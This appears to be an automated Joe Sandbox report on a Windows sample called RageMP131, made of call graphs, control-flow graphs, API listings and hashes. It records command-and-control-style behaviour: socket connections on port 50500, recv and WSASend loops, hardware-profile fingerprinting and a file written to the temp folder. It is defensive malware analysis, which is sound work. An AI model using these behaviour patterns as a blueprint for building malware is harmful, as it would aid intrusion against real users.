23821->23814 23822->23814 23828 363e0f 23823->23828 23825 363e70 23833 364473 RtlAllocateHeap __dosmaperr 23825->23833 23827 363e55 23827->23818 23828->23827 23829 363ab3 23828->23829 23830 363ac0 __dosmaperr std::_Facet_Register 23829->23830 23831 363aeb RtlAllocateHeap 23830->23831 23832 363afe __dosmaperr 23830->23832 23831->23830 23831->23832 23832->23825 23833->23827 23917 284ab0 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23839 3562a8 23840 3562bb ___std_exception_copy 23839->23840 23845 356183 23840->23845 23842 3562c7 23852 351b9c RtlAllocateHeap ___std_exception_copy 23842->23852 23844 3562d3 23846 35618f std::locale::_Setgloballocale 23845->23846 23847 356199 23846->23847 23849 3561bc 23846->23849 23867 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 23847->23867 23850 3561b4 23849->23850 23853 35621a 23849->23853 23850->23842 23852->23844 23854 356227 23853->23854 23855 35624a 23853->23855 23879 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 23854->23879 23857 356242 23855->23857 23858 352c91 4 API calls 23855->23858 23857->23850 23859 356262 23858->23859 23868 3644ad 23859->23868 23862 363642 RtlAllocateHeap 23863 356276 23862->23863 23872 3620ff 23863->23872 23867->23850 23869 3644c4 23868->23869 23870 35626a 23868->23870 23869->23870 23881 364473 RtlAllocateHeap __dosmaperr 23869->23881 23870->23862 23873 362128 23872->23873 23878 35627d 23872->23878 23874 362177 23873->23874 23876 36214f 23873->23876 23886 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 23874->23886 23882 36206e 23876->23882 23878->23857 23880 364473 RtlAllocateHeap __dosmaperr 23878->23880 23879->23857 23880->23857 23881->23870 23883 36207a std::locale::_Setgloballocale 23882->23883 23885 3620b9 23883->23885 23887 3621d2 23883->23887 23885->23878 23886->23878 23888 367d9e RtlAllocateHeap 23887->23888 23889 3621e2 23888->23889 23891 36221a 23889->23891 23892 367d9e RtlAllocateHeap 23889->23892 23897 3621e8 23889->23897 23893 367d9e RtlAllocateHeap 23891->23893 23891->23897 23894 362211 23892->23894 23895 362226 FindCloseChangeNotification 23893->23895 23896 367d9e RtlAllocateHeap 23894->23896 23895->23897 23896->23891 23899 367d0d RtlAllocateHeap __dosmaperr 23897->23899 23898 362240 23898->23885 23899->23898 23909 35a828 SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23923 278b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23924 28a100 7 API calls 3 library calls 23561 4e10a22 GetCurrentHwProfileW 23562 3567f6 23563 356809 ___std_exception_copy 23562->23563 23568 35654d 23563->23568 23565 35681e 23575 351b9c RtlAllocateHeap ___std_exception_copy 23565->23575 23567 35682b 23570 356559 std::locale::_Setgloballocale 23568->23570 23569 35655f 23585 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 23569->23585 23570->23569 23572 3565a2 23570->23572 23576 3566d0 23572->23576 23574 35657a 23574->23565 23575->23567 23577 3566f6 23576->23577 23578 3566e3 23576->23578 23586 3565f7 23577->23586 23578->23574 23580 356719 23584 3567a7 23580->23584 23590 352c91 23580->23590 23584->23574 23585->23574 23587 356608 23586->23587 23589 356660 23586->23589 23587->23589 23599 35b7fd SetFilePointerEx RtlAllocateHeap ___std_exception_copy 23587->23599 23589->23580 23591 352cd1 23590->23591 23592 352caa 23590->23592 23596 35b83d 23591->23596 23592->23591 23600 363642 23592->23600 23594 352cc6 23607 362a4b 23594->23607 23651 35b71c 23596->23651 23598 35b856 23598->23584 23599->23589 23601 363663 23600->23601 23602 36364e 23600->23602 23601->23594 23614 35a8ff RtlAllocateHeap __dosmaperr 23602->23614 23604 363653 23615 351e60 RtlAllocateHeap ___std_exception_copy 23604->23615 23606 36365e 23606->23594 23609 362a57 std::locale::_Setgloballocale 23607->23609 23608 362a5f 23608->23591 23609->23608 23610 362a98 23609->23610 23612 362ade 23609->23612 23630 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 23610->23630 23612->23608 23616 362b5c 23612->23616 23614->23604 23615->23606 23617 362b84 23616->23617 23629 362ba7 23616->23629 23618 362b88 23617->23618 23620 362be3 23617->23620 23636 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 23618->23636 23621 362c01 23620->23621 23622 35b83d 2 API calls 23620->23622 23631 3626a1 23621->23631 23622->23621 23625 362c60 23627 362cc9 WriteFile 23625->23627 23625->23629 23626 362c19 23626->23629 23637 362272 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor _ValidateLocalCookies std::locale::_Locimp::_Locimp 23626->23637 23627->23629 23629->23608 23630->23608 23638 36e404 23631->23638 23633 3626b3 23634 3626e1 23633->23634 23647 3573d0 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor ___std_exception_copy 23633->23647 23634->23625 23634->23626 23636->23629 23637->23629 23639 36e411 23638->23639 23640 36e41e 23638->23640 23648 35a8ff RtlAllocateHeap __dosmaperr 23639->23648 23642 36e42a 23640->23642 23649 35a8ff RtlAllocateHeap __dosmaperr 23640->23649 23642->23633 23644 36e416 23644->23633 23645 36e44b 23650 351e60 RtlAllocateHeap ___std_exception_copy 23645->23650 23647->23634 23648->23644 23649->23645 23650->23644 23656 367d9e 23651->23656 23653 35b72e 23654 35b74a SetFilePointerEx 23653->23654 23655 35b736 23653->23655 23654->23655 23655->23598 23657 367dab 23656->23657 23659 367dc0 23656->23659 23669 35a8ec RtlAllocateHeap __dosmaperr 23657->23669 23663 367de5 23659->23663 23671 35a8ec RtlAllocateHeap __dosmaperr 23659->23671 23660 367db0 23670 35a8ff RtlAllocateHeap __dosmaperr 23660->23670 23663->23653 23664 367df0 23672 35a8ff RtlAllocateHeap __dosmaperr 23664->23672 23665 367db8 23665->23653 23667 367df8 23673 351e60 RtlAllocateHeap ___std_exception_copy 23667->23673 23669->23660 23670->23665 23671->23664 23672->23667 23673->23665 23935 4e10737 GetCurrentHwProfileW GetCurrentHwProfileW 23926 272540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::locale::_Locimp::_Locimp 23903 4e10809 GetCurrentHwProfileW GetCurrentHwProfileW

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 821044-821074 GetPEB 1 821077-82109a 0->1 2 82109d-8210a0 1->2 3 8210a6-8210bc 2->3 4 8211ee-82122b GetTempPathA CreateFileA 2->4 5 821110-821116 3->5 6 8210be-8210c5 3->6 11 821265-821269 4->11 12 82122d-821230 4->12 8 821118-82111f 5->8 9 821129-82112f 5->9 6->5 10 8210c7-8210ce 6->10 8->9 13 821121-821124 8->13 14 821131-821138 9->14 15 821148-82114e 9->15 10->5 16 8210d0-8210d7 10->16 17 821232-821238 12->17 18 8211bb-8211c0 13->18 14->15 19 82113a-821141 14->19 20 821150-821157 15->20 21 821167-82116f 15->21 16->5 22 8210d9-8210dd 16->22 23 821246-821251 17->23 24 82123a-821242 17->24 26 8211c2-8211c5 18->26 27 8211e0-8211e9 18->27 19->15 25 821143-821146 19->25 20->21 28 821159-821160 20->28 29 821171-821178 21->29 30 821188-82118e 21->30 22->5 31 8210df-8210e3 22->31 42 821255-821261 23->42 24->17 34 821244 24->34 25->18 26->27 35 8211c7-8211ca 26->35 27->2 28->21 36 821162-821165 28->36 29->30 37 82117a-821181 29->37 32 821190-821197 30->32 33 8211a7-8211ad 30->33 31->18 38 8210e9-82110b 31->38 32->33 40 821199-8211a0 32->40 33->18 41 8211af-8211b6 33->41 34->42 35->27 43 8211cc-8211cf 35->43 36->18 37->30 39 821183-821186 37->39 38->1 39->18 40->33 45 8211a2-8211a5 40->45 41->18 46 8211b8 41->46 42->11 43->27 47 8211d1-8211d4 43->47 45->18 46->18 47->27 49 8211d6-8211d9 47->49 49->27 50 8211db-8211de 49->50 50->4 50->27
                                    APIs
                                    • GetTempPathA.KERNELBASE(00000104,?), ref: 008211FA
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00821223
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFilePathTemp
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WwKLWFk.exe$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 1031868398-1035807574
                                    • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction ID: 3075cfa525de2dac800afc0fb3ac393af3226dd00b7612f6e2224f353ea8c955
                                    • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction Fuzzy Hash: 46611874D01229DBCF24CF94E888AADF7B4FF64315F2592AAD605AB200C3709ED1CB95
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b51dd48258456589420fd8c5e80596941399f0597e76b0af73547b045d8da6dc
                                    • Instruction ID: 685f9140f8bbf2b85bcf19878be535e6d0421ac7c90e5bf3f9cf5fdc233876c1
                                    • Opcode Fuzzy Hash: b51dd48258456589420fd8c5e80596941399f0597e76b0af73547b045d8da6dc
                                    • Instruction Fuzzy Hash: 7D21B0E724C130ACF20285516B54AF66B2EF3C6330331A917FA47D4986E2892A8E7131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 51 28ec20-28ec58 52 28ec5e 51->52 53 28f0bf-28f0d3 51->53 54 28ec64-28ec6c 52->54 55 28ec6e-28ec94 call 28db60 54->55 56 28eca7-28ecf0 setsockopt recv 54->56 58 28ec99-28eca1 55->58 56->53 61 28ecf6-28ecf9 56->61 58->56 60 28f0aa-28f0b9 Sleep 58->60 60->53 60->54 62 28ecff-28ed53 call 2d8330 recv 61->62 63 28f037-28f053 call 284a90 61->63 71 28ed59-28ed74 recv 62->71 72 28efe4-28eff1 62->72 69 28f09c-28f0a4 Sleep 63->69 70 28f055 63->70 69->60 73 28f05f-28f086 call 28e060 70->73 74 28f057-28f05d 70->74 71->72 77 28ed7a-28edb1 71->77 72->69 76 28eff7-28f003 72->76 80 28f08b-28f097 73->80 74->69 74->73 81 28f019-28f023 call 34cbd1 76->81 82 28f005-28f013 76->82 78 28edb3-28ee11 call 2d8330 recv 77->78 79 28ee14-28ee44 call 2d5a60 77->79 78->79 89 28ee4a 79->89 90 28ef64-28efb3 call 28e460 79->90 80->69 81->69 82->81 92 28ee50-28ef5e 89->92 90->72 97 28efb5-28efc4 90->97 92->90 98 28efda-28efe1 call 34cbd1 97->98 99 28efc6-28efd4 97->99 98->72 99->98
                                    APIs
                                    • setsockopt.WS2_32(0000033C,0000FFFF,00001006,?,00000008), ref: 0028ECC6
                                    • recv.WS2_32(?,00000004,00000002), ref: 0028ECE1
                                    • recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 0028ED4E
                                    • recv.WS2_32(00000000,0000000C,00000008), ref: 0028ED6F
                                    • recv.WS2_32(00000000,?,00000008), ref: 0028EE0C
                                      • Part of subcall function 0028DB60: WSAStartup.WS2_32 ref: 0028DB8A
                                      • Part of subcall function 0028DB60: socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
                                      • Part of subcall function 0028DB60: connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC42
                                      • Part of subcall function 0028DB60: closesocket.WS2_32(00000000), ref: 0028DC4D
                                    • recv.WS2_32(?,00000004,00000008), ref: 0028F033
                                    • Sleep.KERNELBASE(00000001), ref: 0028F09E
                                    • Sleep.KERNELBASE(00000064), ref: 0028F0AC
                                    • __Mtx_unlock.LIBCPMT ref: 0028F211
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: recv$Sleep$Mtx_unlockStartupclosesocketconnectsetsockoptsocket
                                    • String ID: 50500$O
                                    • API String ID: 2930922264-581959401
                                    • Opcode ID: ddfed0382b041169c167ac837b55ba4cdea574968ae53a242cba0ff2b24bbffc
                                    • Instruction ID: 1fc210379494b6ab33b4d97901b34d4d04006f1a7de710aecaa7c106d0d515e8
                                    • Opcode Fuzzy Hash: ddfed0382b041169c167ac837b55ba4cdea574968ae53a242cba0ff2b24bbffc
                                    • Instruction Fuzzy Hash: 0DB1DE31D11259CFEB21EFA8CC81BADBBB5FF56310F248219E444AB2D6D7B06994CB50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 102 28e060-28e0af call 2d5a60 105 28e1d4-28e20a call 2d58e0 102->105 106 28e0b5-28e0b8 102->106 112 28e238-28e26c call 277d20 105->112 113 28e20c-28e218 105->113 108 28e0c0-28e0e6 106->108 110 28e0f8-28e107 108->110 111 28e0e8-28e0f3 108->111 115 28e109-28e112 110->115 116 28e117-28e123 110->116 114 28e1c7 111->114 132 28e26e-28e280 112->132 133 28e282-28e28a call 2d8330 112->133 119 28e21a-28e228 113->119 120 28e22e-28e235 call 34cbd1 113->120 122 28e1ca-28e1ce 114->122 115->114 117 28e133-28e13f 116->117 118 28e125-28e12e 116->118 123 28e14c-28e158 117->123 124 28e141-28e14a 117->124 118->114 119->120 125 28e44b call 351e70 119->125 120->112 122->105 122->108 128 28e15a-28e163 123->128 129 28e165-28e171 123->129 124->114 134 28e450-28e455 call 351e70 125->134 128->114 135 28e17e-28e18a 129->135 136 28e173-28e17c 129->136 137 28e28f-28e2e2 call 277d20 * 2 132->137 133->137 140 28e18c-28e195 135->140 141 28e197-28e1a3 135->141 136->114 150 28e2e4-28e313 call 277d20 call 34e630 137->150 151 28e316-28e32c call 277d20 137->151 140->114 144 28e1b0-28e1b9 141->144 145 28e1a5-28e1ae 141->145 144->122 148 28e1bb-28e1c3 144->148 145->114 148->114 150->151 157 28e332-28e338 151->157 158 28e3b7 151->158 161 28e340-28e36c 157->161 159 28e3bb-28e3c1 158->159 162 28e3eb-28e403 159->162 163 28e3c3-28e3cf 159->163 164 28e370-28e37b 161->164 167 28e435-28e44a 162->167 168 28e405-28e411 162->168 165 28e3e1-28e3e8 call 34cbd1 163->165 166 28e3d1-28e3df 163->166 164->164 169 28e37d-28e3ab WSASend 164->169 165->162 166->134 166->165 171 28e42b-28e432 call 34cbd1 168->171 172 28e413-28e421 168->172 179 28e3ad-28e3b5 169->179 180 28e425-28e429 169->180 171->167 172->134 175 28e423 172->175 175->171 179->158 179->161 180->159
                                    APIs
                                    • WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00374438,00000000,00000000,-003A65B0), ref: 0028E3A6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Send
                                    • String ID: 131$50500$Ws2_32.dll$\;:$ta:$;:$O
                                    • API String ID: 121738739-3323569928
                                    • Opcode ID: fecb6ec7590042f329d492d11ca54f624bb721b829d6978ebfb05d504757f4f3
                                    • Instruction ID: 9e43fff9f75cada7380a55552b3dc70dd56389b92bd8d9e383f446399dd318c0
                                    • Opcode Fuzzy Hash: fecb6ec7590042f329d492d11ca54f624bb721b829d6978ebfb05d504757f4f3
                                    • Instruction Fuzzy Hash: 94D1EE30E14249DFDF14EFA8CC55BADBBF5AF02310F694258D855AB2C2E7709886CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 181 28db60-28db92 WSAStartup 182 28db98-28dbc2 call 277d20 * 2 181->182 183 28dc66-28dc6f 181->183 188 28dbce-28dc14 182->188 189 28dbc4-28dbc8 182->189 191 28dc60 188->191 192 28dc16-28dc1c 188->192 189->183 189->188 191->183 193 28dc1e 192->193 194 28dc74-28dc7e 192->194 195 28dc24-28dc38 socket 193->195 194->191 198 28dc80-28dc88 194->198 195->191 197 28dc3a-28dc4a connect 195->197 199 28dc4c-28dc54 closesocket 197->199 200 28dc70 197->200 199->195 201 28dc56-28dc5a 199->201 200->194 201->191
                                    APIs
                                    • WSAStartup.WS2_32 ref: 0028DB8A
                                    • socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
                                    • connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC42
                                    • closesocket.WS2_32(00000000), ref: 0028DC4D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startupclosesocketconnectsocket
                                    • String ID: 50500
                                    • API String ID: 3098855095-2230786414
                                    • Opcode ID: 00f5683ff68a194f8f122a84d0c006985bbd798e0cc34ee4b86dad181838ef47
                                    • Instruction ID: 6a8bd0c29f5f9e54301da03b1fafdd35652c504dd64ced641834988f4d619c07
                                    • Opcode Fuzzy Hash: 00f5683ff68a194f8f122a84d0c006985bbd798e0cc34ee4b86dad181838ef47
                                    • Instruction Fuzzy Hash: 1F31D0765153016BC6209F289C89B6BB7E4EB89724F115F1EF8A8A32D0D370991887A2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 202 4e1082a-4e109ab 222 4e109bc-4e109f7 call 4e109f9 202->222 226 4e109f9-4e10aab 222->226 235 4e10ab7-4e10abd GetCurrentHwProfileW 226->235 236 4e10acd-4e10cc8 call 4e10cdb 235->236
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: f44af7dcb7d6cf9b9245ba24cf6e8ab07a473a1bea746b99977617cfae1eda2f
                                    • Instruction ID: 32f7abbda54d3e3e89f78887941334d749802681f14518ae26bf9f92da8cf05f
                                    • Opcode Fuzzy Hash: f44af7dcb7d6cf9b9245ba24cf6e8ab07a473a1bea746b99977617cfae1eda2f
                                    • Instruction Fuzzy Hash: 835123F73CD214BDF14285915B60AF62A6EE7C7330730A462F407D6E62F2942EC96471

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 262 4e1089a-4e108a5 263 4e10840-4e10895 262->263 264 4e108a7-4e108a9 262->264 265 4e108ab-4e109ab 263->265 264->265 283 4e109bc-4e109f7 call 4e109f9 265->283 287 4e109f9-4e10aab 283->287 296 4e10ab7-4e10abd GetCurrentHwProfileW 287->296 297 4e10acd-4e10cc8 call 4e10cdb 296->297
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 28de2bd788922d9a2c8f0c099718b21ade2f6754805080a383b1e21aa2c45691
                                    • Instruction ID: 36bf8d46e031de4fc805e46f47fbd3a6da6a6d0234c9fc2459b57acddd4c8dd6
                                    • Opcode Fuzzy Hash: 28de2bd788922d9a2c8f0c099718b21ade2f6754805080a383b1e21aa2c45691
                                    • Instruction Fuzzy Hash: F05120F73CD214BCF142C6915B60AF66A6EE7C7330730A463F4079AE62F2946AC96471

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 323 4e10809-4e109ab 344 4e109bc-4e109f7 call 4e109f9 323->344 348 4e109f9-4e10aab 344->348 357 4e10ab7-4e10abd GetCurrentHwProfileW 348->357 358 4e10acd-4e10cc8 call 4e10cdb 357->358
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 88f906fc994121196160430ef0a88620cf1b743718c5a6ee6371186ca41911d0
                                    • Instruction ID: b11d409a2dfb9b13c753eacac651e5c4c68153e0f97f5715ec4f49e524cdc984
                                    • Opcode Fuzzy Hash: 88f906fc994121196160430ef0a88620cf1b743718c5a6ee6371186ca41911d0
                                    • Instruction Fuzzy Hash: 57510DF73CD210BDF14286855B60AF62A6EE7C7330730A462F40B96E62F2946AC97531

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 384 4e10802-4e109ab 406 4e109bc-4e109f7 call 4e109f9 384->406 410 4e109f9-4e10aab 406->410 419 4e10ab7-4e10abd GetCurrentHwProfileW 410->419 420 4e10acd-4e10cc8 call 4e10cdb 419->420
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: cd3536ee92f32f35ffac3d900ebc129bcb4de26301ff9e7560ec6e9423edf371
                                    • Instruction ID: 33e6cbdeaf29f635c2329ec2beeee69cca364f7f835afa8a6ce0393d06c04ec4
                                    • Opcode Fuzzy Hash: cd3536ee92f32f35ffac3d900ebc129bcb4de26301ff9e7560ec6e9423edf371
                                    • Instruction Fuzzy Hash: F251EFF73CD214FDF14286855B60AF62A6EE7C7330730A462F40B96E62F2946AC97471

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 446 4e108b6-4e109ab 458 4e109bc-4e109f7 call 4e109f9 446->458 462 4e109f9-4e10aab 458->462 471 4e10ab7-4e10abd GetCurrentHwProfileW 462->471 472 4e10acd-4e10cc8 call 4e10cdb 471->472
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8ec79d8d5581459b19fc749cafe0c603d61dd745b48af954a6b211efb5017aa3
                                    • Instruction ID: 5fdd456633a1a5298aa8ec206ed979f1ee03d0b3aff7693d1c8626ff5ae496a0
